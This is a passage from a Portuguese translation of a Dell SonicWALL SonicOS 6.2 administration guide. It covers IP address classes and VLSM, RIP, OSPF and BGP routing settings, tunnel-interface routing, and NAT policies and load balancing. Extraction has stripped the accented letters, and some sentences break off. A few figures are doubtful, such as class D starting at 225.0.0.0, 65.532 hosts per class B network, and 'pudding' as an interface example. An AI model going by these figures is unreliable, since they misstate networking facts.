0nnnnnnn hhhhhhhh hhhhhhhh hhhhhhhh (mscara de rede com classe de 8 bits)
126 redes de classe A, 16.777.214 hosts cada
Classe B 128.0.0.0 a 191.255.0.0
10 bits mais esquerda; 14 bits de rede; 16 bits de host
10nnnnnn nnnnnnnn hhhhhhhh hhhhhhhh (mscara de rede com classe de 16 bits)
16.384 redes de classe B, 65.532 hosts cada
Classe C 192.0.0.0 a 223.255.255.0
110 bits mais esquerda; 21 bits de rede; 8 bits de host
110nnnnn nnnnnnnn nnnnnnnn hhhhhhhh (mscara de rede com classe de 24 bits)
2.097.152 redes de classe C, 254 hosts cada
Classe D 225.0.0.0 a 239.255.255.255 (difuso seletiva)
1110 bits mais esquerda; 28 bits de endereo de difuso seletiva
1110mmmm mmmmmmmm mmmmmmmm mmmmmmmm
Classe E 240.0.0.0 a 255.255.255.255 (reservado)
1111 bits mais esquerda; 28 bits de endereo reservado
1111rrrr rrrrrrrr rrrrrrrr rrrrrrrr
Esse mtodo de alocao de endereo provou ser muito ineficiente porque no fornece
qualquer flexibilidade no caminho de segmentao (sub-redes) ou agregao (combinao
de redes ou CIDR roteamento entre domnios sem classe) por meio de VLSM (mscaras
de sub-rede de comprimento varivel).
A VLSM, suportada por RIPv2 e OSPF, permite que a representao de redes sem classe
divida redes maiores em redes menores:
Por exemplo, atribua uma mscara de rede /24 rede com classe 10.0.0.0/8. Essa
diviso em sub-redes aloca 16 bits adicionais do intervalo de host ao intervalo de rede
(24-8=16). Para calcular o nmero de redes adicionais que fornece estas sub-redes,
eleve 2 ao nmero de bits adicionais: 2^16=65.536. Portanto, em vez de uma nica
rede com 16,7 milhes de hosts (geralmente mais do que exigido pela maioria das
LAN), possvel ter 65.536 redes, cada uma com 254 hosts utilizveis.
A VLSM tambm permite a agregao de rotas (CIDR):
Por exemplo, se voc tivesse 8 redes de classe C, 192.168.0.0/24 a 192.168.7.0/24,
em vez de precisar ter uma instruo de rota separada para cada uma delas, seria
possvel fornecer uma nica rota para 192.168.0.0/21 que incluiria todas elas.

Essa capacidade, alm de fornecer uma alocao de espao de endereo IP mais eficiente
e flexvel, tambm permite que as tabelas de roteamento e as atualizaes de roteamento
sejam menores.
Topologias de sistema autnomo um sistema autnomo (AS) um conjunto de
roteadores que esto sob controle administrativo comum e que compartilha as mesmas
caractersticas de roteamento. Quando um grupo de sistemas autnomos compartilha
informaes de roteamento, eles so conhecidos como uma confederao de sistemas
autnomos. (RFC1930 e RFC975 abordam esses conceitos com mais detalhes.) Em
termos simples, um AS uma distino lgica que engloba elementos de rede fsica com
base nos aspectos comuns de suas configuraes.
Com relao a RIP e OSPF, os sistemas autnomos de RIP no podem ser segmentados
e todas as informaes de roteamento devem ser anunciadas (difuso) por meio de todo
o AS. Isso pode se tornar difcil de gerenciar e pode resultar em trfego de informaes de
roteamento excessivo. O OSPF, por outro lado, emprega o conceito de reas e permite
segmentao de forma lgica e gerencivel para controlar o compartilhamento de
informaes em um AS. As reas do OSPF comeam com a rea de backbone (rea 0 ou
0.0.0.0) e todas as outras reas devem se conectar a esta rea de backbone (embora
existam excees). Essa capacidade de segmentar o AS de roteamento ajuda a garantir
que ele nunca se tornar grande demais para gerenciamento ou demasiado intensivo em
termos computacionais para os roteadores manipularem.
Configurando os servios de roteamento avanado de RIP e OSPF

As sees a seguir descrevem como configurar o roteamento avanado:
Configurar RIP na pgina 313
Configurar OSPF na pgina 315
Configurar roteamento avanado para interfaces de tnel na pgina 317
Nota ARS um conjunto de roteamento multiprotocolo completo. O grande nmero de

parmetros e opes configurveis fornecidos incompatvel com a simplicidade de uma
interface de usurio grfica. Em vez de limitar a funcionalidade de ARS, uma representao
abreviada de seus recursos tem sido processada na GUI, oferecendo controle sobre os
recursos de roteamento mais relevantes, enquanto o conjunto de comando completo est
disponvel por meio da CLI. A CLI de ARS pode ser acessada atravs de uma sesso de
CLI autenticada e contm 3 mdulos:
rotear ars-nsm servios de roteamento avanado mdulo de servios de rede. Este

componente fornece controle sobre a funcionalidade de roteador central, como ligaes de
interface e rotas que podem ser redistribudas.
rotear ars-rip o mdulo RIP. Oferece controle sobre o roteador RIP.
rotear ars-ospf o mdulo OSPF. Oferece controle sobre o roteador OSPF.
Em geral, todas as funcionalidades necessrias para integrar o firewall na maioria dos
ambientes de RIP e OSPF esto disponveis por meio da GUI baseada na Web. Os
recursos adicionais da CLI tornaro possveis mais configuraes avanadas. Consulte o
apndice para obter o conjunto completo de comandos ARS CLI.

Por padro, os servios de roteamento avanado esto desabilitados e devem ser habilitados
para ficarem disponveis. Na parte superior da pgina Rede > Roteamento encontra-se um
menu suspenso para Modo de roteamento. Quando voc seleciona Usar roteamento
avanado, o topo da pgina Rede > Roteamento ficar da seguinte maneira:
A operao dos protocolos de roteamento RIP e OSPF dependente da interface. Cada

interface e subinterface virtual podem ter configuraes de RIP e OSPF definidas
separadamente e cada interface pode executar roteadores de RIP e OSPF.
Configurar RIP e OSPF para rotas padro recebidas de protocolos de roteamento avanado
da seguinte maneira:
Configurar RIP
Para configurar o roteamento de RIP em uma interface, selecione o cone (Configurar) na

linha da interface sob a coluna "Configurar RIP". Isso exibir a janela Configurao de RIP.
Modos RIP
Desabilitado o RIP est desabilitado nesta interface
Enviar e receber o roteador de RIP nesta interface enviar atualizaes e processar
atualizaes recebidas.

Enviar apenas o roteador de RIP nesta interface enviar somente atualizaes e no
processar atualizaes recebidas. Isso semelhante implementao bsica do
roteamento.
Receber apenas o roteador de RIP nesta interface processar apenas atualizaes
recebidas.
Passivo o roteador de RIP nesta interface no processar atualizaes recebidas e s
enviar atualizaes para roteadores de RIP vizinhos especificados com o comando
"neighbor" da CLI. Esse modo apenas deve ser usado ao configurar opes avanadas de
RIP na CLI ars-rip.
Receber (disponvel nos modos "Enviar e receber" e "Receber apenas")

RIPv1 receber apenas pacotes RIPv1 de difuso.
RIPv2 receber apenas pacotes RIPv2 de difuso seletiva. Os pacotes RIPv2 so
enviados por difuso seletiva, embora algumas implementaes de roteadores de RIP
(incluindo o roteamento bsico em dispositivos SonicWALL) tenham a capacidade de
enviar RIPv2 em formatos de difuso ou difuso seletiva.
Nota Certifique-se de que o dispositivo de envio de atualizaes RIPv2 usa o modo de difuso
seletiva, caso contrrio, as atualizaes no sero processadas pelo roteador ars-rip.
Enviar (disponvel nos modos "Enviar e receber" e "Enviar apenas")

RIPv1 enviar pacotes RIPv1 de difuso.
Compatvel com RIPv2 v1 enviar pacotes RIPv2 de difuso seletiva que so
compatveis com RIPv1.
RIPv2 enviar pacotes RIPv2 de difuso seletiva.
Omisso de rotas a habilitao da omisso de rotas suprimir a incluso de rotas em
atualizaes para os roteadores a partir dos quais so aprendidas. Este um mecanismo de
RIP comum para impedir loops de roteamento. Consulte a entrada "saltos mximos" no incio
da seo Servios de roteamento avanado.
Reverso invlida a reverso invlida um modo opcional de operao de omisso de rotas.
Em vez de suprimir a incluso de rotas aprendidas, as rotas so enviadas com uma mtrica de
infinito (16), indicando assim que so inacessveis. Consulte a entrada "saltos mximos" no
incio da seo Servios de roteamento avanado.
Usar senha permite o uso de uma senha de texto simples nesta interface, at 16 caracteres
alfanumricos, para identificao.
Mtrica padro usada para especificar a mtrica que ser usada ao redistribuir rotas de
outras fontes de informao roteamento (padro, esttico, conectado, OSPF ou VPN). O valor
padro (indefinido) 1 e o mximo 15.
Distncia administrativa o valor de distncia administrativa usado por roteadores ao
selecionar um caminho quando existe mais de uma rota para um destino, sendo preferencial a
distncia menor. O valor padro 120, o mnimo 1 e o mximo 255.
Originar rota padro esta caixa de seleo habilita ou desabilita o anncio da rota padro do
firewall no sistema RIP.
Redistribuir rotas estticas habilita ou desabilita o anncio de rotas estticas (roteamento
baseado em poltica) no sistema RIP. possvel configurar a mtrica explicitamente para esta
redistribuio ou ento pode usar o valor (padro) especificado na configurao "Mtrica
padro".

Redistribuir redes conectadas habilita ou desabilita o anncio de redes conectadas
localmente no sistema RIP. possvel configurar a mtrica explicitamente para esta
redistribuio ou ento pode usar o valor (padro) especificado na configurao "Mtrica
padro".
Redistribuir rotas OSPF habilita ou desabilita o anncio de rotas aprendidas via OSPF no
sistema RIP. possvel configurar a mtrica explicitamente para esta redistribuio ou ento
pode usar o valor (padro) especificado na configurao "Mtrica padro".
Redistribuir redes de VPN remotas habilita ou desabilita o anncio de rotas estticas
(roteamento baseado em poltica) no sistema RIP. possvel configurar a mtrica
explicitamente para esta redistribuio ou ento pode usar o valor (padro) especificado na
configurao "Mtrica padro".
As rotas aprendidas via RIP sero exibidas na tabela Polticas de rota como Rota OSPF ou
RIP.
Configurar OSPF
Nota Os conceitos de design do OSPF esto alm do escopo deste documento. A seo a seguir
descreve como configurar um SonicWALL para integrar em uma rede OSPF, seja ela
existente ou recentemente implementada, mas sem diretrizes de design. Para termos
usados ao longo desta seo, consulte a seo "Termos de OSPF" acima.
Considere a seguinte rede de exemplo simples:

Em uma rede OSPF em que o backbone (rea 0.0.0.0) inclui a interface X0 no firewall e a
interface int1 no Roteador A, duas reas adicionais (0.0.0.1 e 100.100.100.100) esto
conectadas, respectivamente, ao backbone atravs da interface int2 no Roteador A de ABR e
atravs da subinterface de VLAN X4:100 no firewall.
Para configurar o roteamento de OSPF nas interfaces X0 e X4:100, selecione o cone

(Configurar) na linha da interface, na coluna "Configurar OSPF". Isso exibir a seguinte janela:

Configurao de OSPFv2
Desabilitado o roteador OSPF est desabilitado nesta interface
Habilitado o roteador OSPF est habilitado nesta interface
Passivo o roteador OSPF est habilitado nesta interface, mas somente anuncia redes
conectadas usando o LSA de tipo 1 (anncio de link de roteador) na rea local. Isso
diferente das opes "Redistribuir redes conectadas", as quais fariam com que o roteador
OSPF se comportasse como um ASBR e usariam o LSA de tipo 5 (anncio de link externo
de AS) para inundar os anncios em todas as reas no stub. Consulte a seo "Termos
de OSPF" para obter mais informaes.
Intervalo de inatividade o perodo aps o qual removida uma entrada no LSDB se no for
recebida uma saudao. O padro 40 segundos, com um mnimo de 1 e um mximo de
65.535. Certifique-se de que esse valor concorda com os outros roteadores de OSPF no
segmento para um estabelecimento vizinho bem-sucedido.
Intervalo de saudao o perodo de tempo entre pacotes de saudao. O padro 10
segundos, com um mnimo de 1 e um mximo de 65.535. Certifique-se de que esse valor
concorda com os outros roteadores de OSPF no segmento para um estabelecimento vizinho
bem-sucedido.
Autenticao certifique-se de que esta configurao concorda com os outros roteadores de
OSPF no segmento para estabelecimento vizinho bem-sucedido.
Desabilitado no usada nenhuma autenticao nesta interface.
Senha simples uma senha de texto simples usada para fins de identificao pelo
roteador de OSPF nesta interface.
Resumo da mensagem um hash MD5 usado para identificar o roteador de OSPF nesta
interface com segurana.
rea OSPF a rea OSPF pode ser representada em notao decimal ou IP. Por exemplo,
voc pode representar a rea conectada X4:100 como 100.100.100.100 ou 1684300900.
Tipo de rea OSPFv2 consulte a seo "Termos de OSPF" acima para uma descrio mais
detalhada dessas configuraes.
Normal recebe e envia todos os tipos de LSA aplicveis.
rea de stub no recebe LSAs do tipo 5 (anncios de link externo de AS).
rea repleta de stubs no recebe LSAs de tipo 3, 4 ou 5.
rea com poucos stubs recebe LSAs de tipo 7 (rotas externas de AS NSSA).
NSSA repleto de stubs recebe LSAs de tipo 1 e 2
Custo da interface especifica a sobrecarga do envio de pacotes nesta interface. O valor
padro 10, geralmente utilizado para indicar uma interface Ethernet. O valor mnimo 1 (por
exemplo, Fast Ethernet) e o valor mximo 65.535 (por exemplo, pudding).
Prioridade do roteador o valor de prioridade do roteador usado para determinar o Roteador
Designado (DR) de um segmento. Quanto maior o valor, maior a prioridade. No caso de uma
ligao de prioridade, a ID do roteador atuar como o separador da ligao. A configurao de
um valor de 0 torna o roteador OSPF nesta interface no elegvel para status de DR. O valor
padro 1 e o valor mximo 255.
ID do roteador OSPF a ID do roteador pode ser qualquer valor, representado em notificao
de endereo IP. Ela no est relacionada a qualquer um dos endereos IP no firewall e pode
ser definida como qualquer valor exclusivo em sua rede OSPF.
Tipo de ABR permite a especificao da topologia com a qual este roteador OSPF estar
participando, para fins de compatibilidade. As opes so:
Padro RFC2328 completo, compatvel com a operao OSPF de ABR.
Cisco para interao com comportamento ABR da Cisco que espera que o backbone
esteja configurado e ativo antes de definir o sinalizador ABR.

IBM para interao com o comportamento ABR da IBM que espera que o backbone
esteja configurado antes de definir o sinalizador ABR.
Atalho uma "rea de atalho" permite que o trfego percorra a rea no backbone com
uma mtrica inferior se o roteador ABR estiver ou no conectado rea 0.
Mtrica padro usada para especificar a mtrica que ser usada ao redistribuir rotas de
outras fontes de informao roteamento (padro, esttico, conectado, RIP ou VPN). O valor
padro (indefinido) 1 e o mximo 16.777.214.
Originar rota padro controla o anncio da rota padro do firewall no sistema OSPF nesta
interface. As opes so:
Nunca desabilita o anncio da rota padro no sistema OSPF.
Quando a WAN estiver ativa anuncia a rota padro no sistema OSPF quando a WAN
estiver on-line. A rota padro sempre anunciada como um Tipo externo 2 usando LSA de
tipo 5.
Sempre habilita anncios da rota padro no sistema OSPF. A rota padro sempre
anunciada como um Tipo externo 2 usando LSA de tipo 5.
Nota O seguinte se aplica a todas as rotas redistribudas: possvel configurar a mtrica

explicitamente para esta redistribuio ou ento pode usar o valor (padro) especificado na
configurao "Mtrica padro". Um valor de marca de rota opcional pode ser adicionado
para ajudar outros roteadores a identificar esta rota redistribuda (o valor de marca padro
0). O anncio de rota redistribuda ser um LSA de tipo 5 e o tipo pode ser selecionado
como Tipo 1 (adiciona o custo de link interno) ou Tipo 2 (somente usa o custo de link
externo).
Redistribuir rotas estticas habilita ou desabilita o anncio de rotas estticas (roteamento

baseado em poltica) no sistema OSPF.
Redistribuir redes conectadas habilita ou desabilita o anncio de redes conectadas
localmente no sistema OSPF.
Redistribuir rotas RIP habilita ou desabilita o anncio de rotas aprendidas via RIP no sistema
OSPF.
Redistribuir redes de VPN remotas habilita ou desabilita o anncio de rotas estticas
(roteamento baseado em poltica) no sistema RIP.
A seo Protocolos de roteamento mostrar o status de todos os roteadores OSPF ativos
atravs de interface.
Os LEDs de status e indicam se existem ou no vizinhos ativos e possvel passar
o mouse sobre eles para obter mais detalhes.
A seo Polticas de roteamento mostrar rotas aprendidas pelo OSPF como Rotas OSPF ou
RIP.
Configurar roteamento avanado para interfaces de tnel

As interfaces de tnel de VPN podem ser configuradas para roteamento avanado. Para tal,
voc deve habilitar o roteamento avanado para a interface de tnel na guia Avanado da sua
configurao. Para obter mais informaes, consulte Adicionando uma Interface de tnel na
pgina 859.

Aps voc tiver habilitado o roteamento avanado para uma interface de tnel, ele ser exibido
na lista com as outras interfaces na tabela Roteamento avanado na pgina Rede >
Roteamento.
Para configurar opes de Roteamento avanado, clique no cone Configurar RIP ou

Configurar OSPF da Interface de tnel que deseja configurar.
As configuraes de RIP e OSPF para Interfaces de tnel so muito semelhantes s
configuraes de interfaces tradicionais com a adio de duas novas opes listadas na parte
inferior da janela de configurao RIP ou OSPF, em um novo ttulo Configurao global no
numerada.
Configurao global no numerada

Como as Interfaces de tnel no so interfaces fsicas e no tm endereos IP inerentes, elas
devem "pedir emprestado" o endereo IP de outra interface. Portanto, a configurao de
roteamento avanado de uma Interface de tnel inclui as seguintes opes para especificar os
endereos IP de origem e destino para o tnel:
Endereo IP emprestado de a interface cujo endereo IP usado como o endereo IP
de origem para a interface de tnel.
Nota O endereo IP emprestado deve ser um endereo IP esttico.
Endereo IP remoto o endereo IP do par remoto ao qual est conectada a interface de

tnel. No caso de uma configurao SonicWALL para SonicWALL com outra interface de
tnel, este deve ser o endereo IP da interface emprestada da interface de tnel no par
remoto.
Nota Os valores de Endereo IP emprestado de e Endereo IP remoto se aplicam a RIP e

OSPF para a Interface de tnel. A alterao de um desses valores no RIP alterar o valor
no OSPF e vice-versa.

Diretrizes para configurar interfaces de tnel para roteamento avanado
As diretrizes a seguir garantiro xito ao configurar interfaces de tnel para roteamento
avanado:
A interface emprestada deve ter uma atribuio de endereo IP esttico.
A interface emprestada no pode ter RIP ou OSPF habilitado na sua configurao.
Dica A SonicWALL recomenda a criao de uma interface de VLAN dedicada exclusivamente

para uso como a interface emprestada. Isso evita conflitos ao usar interfaces conectadas
com fio.
O endereo IP da interface emprestada deve ser de um espao de endereo privado e

deve ter um endereo IP exclusivo relativamente a quaisquer pontos terminais de Interface
de tnel remotos.
O endereo IP remoto do ponto terminal da Interface de tnel deve estar na mesma sub-
rede de rede que a interface emprestada.
A mesma interface emprestada pode ser usada para vrias Interfaces de tnel, desde que
todas as interfaces de tnel estejam conectadas a diferentes dispositivos remotos.
Quando mais de uma Interface de tnel em um dispositivo estiver conectada ao mesmo
dispositivo remoto, cada Interface de tnel deve usar uma interface emprestada exclusiva.
Dependendo das circunstncias especficas de sua configurao de rede, estas diretrizes
podem no ser essenciais para garantir o funcionamento correto da Interface de tnel. Mas
estas diretrizes so as prticas recomendadas da SonicWALL que evitaro possveis
problemas de conectividade de rede.

Configurar roteamento avanado do BGP
O BGP (Border Gateway Protocol) um protocolo de roteamento em grande escala usado para
comunicar informaes de roteamento entre sistemas autnomos (ASs), os quais so
domnios de rede bem definidos e administrados separadamente. O suporte de BGP permite
que firewalls substituam um roteador BGP tradicional no limite do AS de uma rede. A
implementao atual de BGP da SonicWALL mais adequada para ambientes de "provedor
nico/hospedagem nica", onde a rede utiliza um ISP como o seu provedor de Internet e tem
uma nica conexo a esse provedor. O BGP da SonicWALL tambm capaz de suportar
ambientes de "provedor nico/hospedagem mltipla", onde a rede utiliza um nico ISP, mas
tem um pequeno nmero de rotas separadas para o provedor. O BGP habilitado na pgina
Rede > Roteamento da GUI do SonicOS e, em seguida, totalmente configurado atravs da
interface de linha de comando (CLI) SonicOS.
Para obter informaes completas sobre a implementao de BGP da SonicWALL, consulte
Roteamento avanado do BGP na pgina 1375.
Configurar um tnel IPSec para sesses de BGP

O BGP transmite pacotes sem codificao. Portanto, para uma segurana forte, a SonicWALL
recomenda configurar um tnel IPSec para usar em sesses de BGP. Para obter um exemplo
dessa configurao, consulte Configurao IPSec do BGP na pgina 1383 em Roteamento
avanado do BGP na pgina 1375.
Habilitar o BGP
Para habilitar o BGP em um dispositivo de segurana Dell SonicWALL, execute as seguintes
tarefas:
1. Na GUI do SonicOS, navegue at a pgina Rede > Roteamento.
2. No menu suspenso Modo de roteamento, selecione Roteamento avanado.
3. No menu suspenso BGP, selecione Habilitado (Configurar com CLI).
Aps o BGP ter sido habilitado atravs da GUI, as especificidades da configurao do BGP
so executadas usando a interface de linha de comando (CLI) do SonicOS. Para obter
informaes completas sobre a implementao de BGP em um dispositivo de segurana Dell
SonicWALL, consulte Roteamento avanado do BGP na pgina 1375.

Roteamento com base em poltica e no IPv6
consulte IPv6 na pgina 1443
O Roteamento com base em poltica totalmente suportado para o IPv6 por meio
da seleo dos objetos do endereo IPv6 e gateways para as polticas de rota da pgina Rede
> Roteamento. Na pgina Rede > Roteamento, o boto de opo Visualizar verso de IP
possui trs opes: Somente IPv4, somente IPv6 ou IPv4 e IPv6. O recurso OSPF exibe dois
botes de opo para alternar entre a verso 2 e a verso 3.
O Protocolo de Informaes de Roteamento da prxima gerao (RIPng) um protocolo de
roteamento de informaes para o IPv6 que permite a troca de informaes entre os
roteadores para calcular rotas por meio de uma rede baseada no IPv6.
Um boto de opo adicionado para alternar entre o RIP e RIPng.
Para obter informaes sobre o anncio de rota, consulte Anncio de rota.
Para obter informaes sobre a configurao de Polticas de rota, consulte Polticas de rota.

Captulo 20
Configurar polticas de NAT
Rede > Polticas de NAT

Polticas de NAT e IPv6 na pgina 324
Tabela de polticas de NAT na pgina 325
Configuraes da poltica de NAT explicadas na pgina 326
Criar polticas de NAT na pgina 331
Usar balanceamento de carga de NAT na pgina 340
O mecanismo Converso de endereo de rede (NAT) no SonicOS permite aos usurios definir
polticas de NAT granulares para o trfego de entrada e sada. Por padro, o dispositivo de
segurana Dell SonicWALL tem uma poltica de NAT pr-configurada para permitir que todos
os sistemas conectados interface X0 executem NAT de muitos para um usando o endereo
IP da interface X1 e uma poltica para no executar NAT quando o trfego atravessa outras
interfaces. Esta seo explica como configurar as polticas de NAT mais comuns.
As noes bsicas sobre como usar polticas de NAT comeam com a construo de um
pacote IP. Cada pacote contm informaes de endereamento que permitem que o pacote
chegue ao seu destino e que o destino responda ao solicitante original. O pacote contm (entre
outras coisas) o endereo IP do solicitante, as informaes de protocolo do solicitante e o
endereo IP do destino. O mecanismo de Polticas de NAT no SonicOS pode inspecionar as
partes relevantes do pacote e dinamicamente reescrever as informaes nos campos
especificados para o trfego de entrada e de sada.
Voc pode adicionar at 512 polticas de NAT em um dispositivo de segurana Dell SonicWALL
executando o SonicOS e elas podem ser to granulares quanto for necessrio. Tambm
possvel criar vrias polticas de NAT para o mesmo objeto, por exemplo, voc pode especificar
que um servidor interno usa um endereo IP ao acessar servidores Telnet e usa um endereo
IP totalmente diferente em todos os outros protocolos. Como o mecanismo NAT no SonicOS
suporta o encaminhamento de porta de entrada, possvel ocultar vrios servidores internos
do endereo IP de WAN do firewall. Quanto mais granular for a poltica de NAT, maior ser a
precedncia.
Configurar polticas de NAT | 323

A tabela a seguir mostra um nmero mximo de rotas e polticas de NAT permitidas para cada
modelo de dispositivos de segurana de rede SonicOS 6.2.
Polticas de
Modelo Rotas
NAT
NSA 2600 1024
NSA 3600 1024
NSA 4600 1024
NSA 5600 2048
NSA 6600 1024 2048
SM 9200 1024 2048
SM 9400 1024 2048
SM 9600 1024 2048
Polticas de NAT e IPv6

As polticas de NAT podem ser configuradas para o IPv6 selecionando os objetos do endereo
IPv6 na pgina Rede > Polticas de NAT. Na pgina Rede > Polticas de NAT, o boto de
opo Exibir verso do IP contm trs opes: Somente IPv4, Somente IPv6 ou IPv4 e IPv6.
Ao configurar polticas de NAT de IPv6, os objetos de origem e destino s podem ser objetos
de endereos IPv6.
Nota A investigao de IPv6 para polticas de NAT no atualmente suportada.

Tabela de polticas de NAT
A tabela Polticas de NAT permite que voc visualize suas polticas de NAT atravs de Todas
as polticas, Polticas personalizadas ou Polticas padro.
Dica Antes de configurar Polticas de NAT, certifique-se de criar todos os Objetos de endereos
associados poltica. Por exemplo, se voc estiver criando uma poltica de NAT um para
um, certifique-se de que tenha Objetos de endereos para seus endereos IP pblicos e
privados.
Dica Por padro, LAN para WAN possui uma poltica de NAT predefinida no firewall.
Navegar e classificar entradas da poltica de NAT

Voc pode alterar o modo de exibio de suas polticas de rota na tabela Polticas de NAT
selecionando uma das configuraes de exibio no menu Ver estilo. Todas as polticas
exibe todas as polticas de roteamento, incluindo Polticas personalizadas e Polticas
padro. Inicialmente, somente as Polticas padro so exibidas na tabela Polticas de rota
quando voc selecionar Todas as polticas no menu Ver estilo.
A tabela Polticas de NAT tabela fornece fcil paginao para a visualizao de um grande
nmero de polticas de VPN. Voc pode navegar em um grande nmero de polticas de VPN
listadas na tabela Polticas de rota usando a barra de controle de navegao localizada na
parte superior direita da tabela Polticas de rota. A barra de controle de navegao inclui
quatro botes. O boto mais esquerda exibe a primeira pgina da tabela. O boto mais
direita exibe a ltima pgina. Os botes de seta interiores para a esquerda e para a direita
movem a pgina anterior ou seguinte, respectivamente.

Voc pode inserir o nmero da poltica (o nmero listado na coluna #) no campo Itens para
avanar para uma poltica de VPN especfica. A configurao de tabela padro exibe 50
entradas por pgina. Voc pode alterar esse nmero padro de entradas de tabelas na pgina
Sistema > Administrao.
Se mover o ponteiro sobre o cone Comentrio na coluna Configurar da tabela Polticas de
NAT, sero exibidos os comentrios inseridos no campo Comentrios da janela Adicionar
poltica de NAT.
Se mover seu ponteiro sobre o cone Estatsticas na coluna Configurar da tabela Polticas de
NAT, sero exibidas as estatsticas de trfego da poltica de NAT.
Se clicar no cone Excluir , ser excluda a entrada de Poltica de NAT. Se o cone estiver
esmaecido, a Poltica de NAT uma entrada padro e voc no pode exclu-la.
Configuraes da poltica de NAT explicadas

A seguir so explicadas as configuraes usadas para criar uma entrada de poltica de NAT
nas janelas Adicionar poltica de NAT ou Editar poltica de NAT.
Clique no boto Adicionar na pgina Rede > Polticas de NAT para exibir a janela Adicionar
poltica de NAT para criar uma nova poltica de NAT ou clique no cone Editar na coluna
Configurar da poltica de NAT que deseja editar para exibir a janela Editar poltica de NAT.
Origem original: Esta configurao de menu suspenso usada para identificar os
endereos IP de origem no pacote que cruza o firewall, quer seja atravs de interfaces ou
em/fora de tneis de VPN. Voc pode usar os Objetos de endereos padro no SonicOS
ou pode criar seus prprios Objetos de endereos. Essas entradas podem ser entradas de
host nico, intervalos de endereos ou sub-redes de IP.

Origem convertida: Esta configurao de menu suspenso aquilo em que a Origem
original convertida medida que sai do firewall, quer seja para outra interface ou em/
fora de tneis de VPN. Voc pode usar os Objetos de endereos padro no SonicOS ou
pode criar suas prprias entradas de Objetos de endereos. Essas entradas podem ser
entradas de host nico, intervalos de endereos ou sub-redes de IP.
Destino original: Esta configurao de menu suspenso usada para identificar os
endereos IP de destino no pacote que cruza o firewall, quer seja atravs de interfaces ou
em/fora de tneis de VPN. Ao criar polticas de NAT de sada, essa entrada normalmente
definida como Qualquer, pois o destino do pacote no est sendo alterado, mas sim a
origem dele. No entanto, essas entradas de Objeto de endereo podem ser entradas de
Destino convertido: Esta configurao de menu suspenso aquilo em que o firewall
converte o Destino original medida que sai do firewall, quer seja para outra interface ou
em/fora de tneis de VPN. Ao criar polticas de NAT de sada, essa entrada normalmente
definida como Original, pois o destino do pacote no est sendo alterado, mas sim a
origem dele. No entanto, essas entradas de Objetos de endereos podem ser entradas de
Servio original: Esta configurao de menu suspenso usada para identificar o servio
de IP no pacote que cruza o firewall, quer seja atravs de interfaces ou em/fora de tneis
de VPN. Voc pode usar os servios padro no firewall ou pode criar suas prprias
entradas. Para muitas polticas de NAT, este campo est definido como Qualquer, pois a
poltica est alterando somente os endereos IP de origem ou de destino.
Servio convertido: Esta configurao de menu suspenso aquilo em que o firewall
converte o Servio original medida que sai do firewall, quer seja para outra interface ou
em/fora de tneis de VPN. Voc pode usar os servios padro no firewall ou pode criar
suas prprias entradas. Para muitas polticas de NAT, este campo est definido como
Original, pois a poltica est alterando somente os endereos IP de origem ou de destino.
Interface de entrada: Esta configurao de menu suspenso usada para especificar a
interface de entrada do pacote. Ao lidar com VPNs, isso geralmente est definido como
Qualquer, pois os tneis de VPN no so realmente interfaces.
Interface de sada: Este menu suspenso usado para especificar a interface de sada do
pacote assim que a poltica de NAT tiver sido aplicada. Este campo usado principalmente
para especificar qual a interface de WAN qual ser aplicada a converso. De todos os
campos na poltica de NAT, este o que tem mais potencial para confuso. Ao lidar com
VPNs, isso geralmente est definido como Qualquer, pois os tneis de VPN no so
realmente interfaces. Alm disso, como indicado na seo "Perguntas e respostas rpidas"
deste captulo, ao criar polticas de NAT um para um de entrada, em que o destino est
sendo remapeado de um endereo IP pblico para um endereo IP particular, este campo
deve ser definido como Qualquer.
Comentrio: Esse campo pode ser usado para descrever sua entrada de poltica de NAT.
O campo tem um limite de 32 caracteres e, uma vez salvo, pode ser visualizado na pgina
principal Rede > Polticas de NAT passando o mouse sobre o balo de texto ao lado da
entrada de poltica de NAT. Seu comentrio aparece em uma janela pop-up se o mouse
estiver sobre o balo de texto.
Habilitar poltica de NAT: Por padro, esta caixa est marcada, o que significa que a nova
poltica de NAT ativada no momento em que salva. Para criar uma entrada de poltica
de NAT, mas no ativ-la imediatamente, desmarque essa caixa.
Criar uma poltica reflexiva: Quando voc marca esta caixa, automaticamente criada
uma poltica de NAT de entrada ou sada espelhada da poltica de NAT que voc definiu
na janela Adicionar poltica de NAT.

Viso geral do balanceamento de carga de NAT
Esta seo fornece uma apresentao do recurso Balanceamento de carga de NAT. Ela
contm as subsees seguintes:
Mecanismos de LB de NAT na pgina 329
Que mtodo de LB de NAT deverei usar? na pgina 330
Avisos na pgina 330
Detalhes de algoritmos de balanceamento de carga na pgina 330
A Converso de endereo de rede (NAT) e o Balanceamento de carga (LB) permitem equilibrar
o trfego de entrada entre vrios recursos de rede semelhantes. No confunda isso com o
recurso de ISP e LB de WAN no firewall. Enquanto os dois recursos podem ser usados em
conjunto, o ISP e LB de WAN so usados para equilibrar o trfego de sada entre duas
conexes de ISP e o LB de NAT usado essencialmente para equilibrar o trfego de entrada.
O balanceamento de carga distribui o trfego entre os recursos de rede semelhantes para que
nenhum servidor fique sobrecarregado, permitindo redundncia e confiabilidade. Se um
servidor ficar indisponvel, o trfego ser roteado para recursos disponveis, proporcionando
um tempo de operao mximo.
Este documento fornece detalhes sobre como configurar as opes NAT, balanceamento de
carga, verificao de integridade, log e regras de firewall necessrias para permitir que
sistemas da Internet pblica acessem um IP virtual (VIP) que mapeie para um ou mais
sistemas internos, como servidores Web, servidores FTP ou dispositivos SRA da SonicWALL.
Esse IP virtual pode ser independente do firewall ou pode ser compartilhado, supondo que o
prprio firewall no est usando a(s) porta(s) em questo.
Observe que o recurso de balanceamento de carga no SonicOS, mesmo sendo razoavelmente bsico,
ir satisfazer os requisitos de muitas implantaes de rede de cliente. Os clientes com ambientes que
precisam de mais balanceamento de carga granular, persistncia e mecanismos de verificao de
integridade so aconselhados a usar um dispositivo dedicado de balanceamento de carga de terceiros
(os preos variam entre 4000 e 25.000 dlares dos EUA por dispositivo).

Mecanismos de LB de NAT
O balanceamento de carga de NAT configurado na guia Avanado de uma poltica de NAT.
Nota Esta guia s pode ser ativada quando um grupo for especificado em um dos campos
suspensos na guia Geral de uma Poltica de NAT. Caso contrrio, a poltica de NAT ser,
por padro, Sticky IP (IP permanente) como o mtodo de NAT.
O SonicOS oferece as seguintes opes avanadas de configurao:
Mtodos de NAT
Sticky IP o IP de origem sempre se conecta ao mesmo IP de destino (supondo que ele
est ativo). Esse mtodo melhor para sites hospedados publicamente que precisam de
